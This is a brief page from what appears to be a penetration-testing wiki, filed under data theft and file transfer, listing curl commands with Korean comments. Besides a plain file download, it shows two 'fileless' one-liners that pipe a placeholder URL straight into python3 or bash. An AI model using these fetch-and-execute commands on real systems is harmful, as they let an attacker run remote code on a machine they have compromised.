> For the complete documentation index, see [llms.txt](https://www.pentestwiki.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.pentestwiki.com/data-theft/file-transper/curl.md).

# curl

<pre class="language-bash"><code class="lang-bash"><strong># 파일 다운로드
</strong>curl '&#x3C;url>' -o '&#x3C;output-path>'

<strong># 파이썬 파일 실행 파일리스 다운로드
</strong>curl '&#x3C;url>' | python3

<strong># 쉘 스크립트 파일 실행 파일리스 다운로드
</strong>curl '&#x3C;url>' | bash
</code></pre>
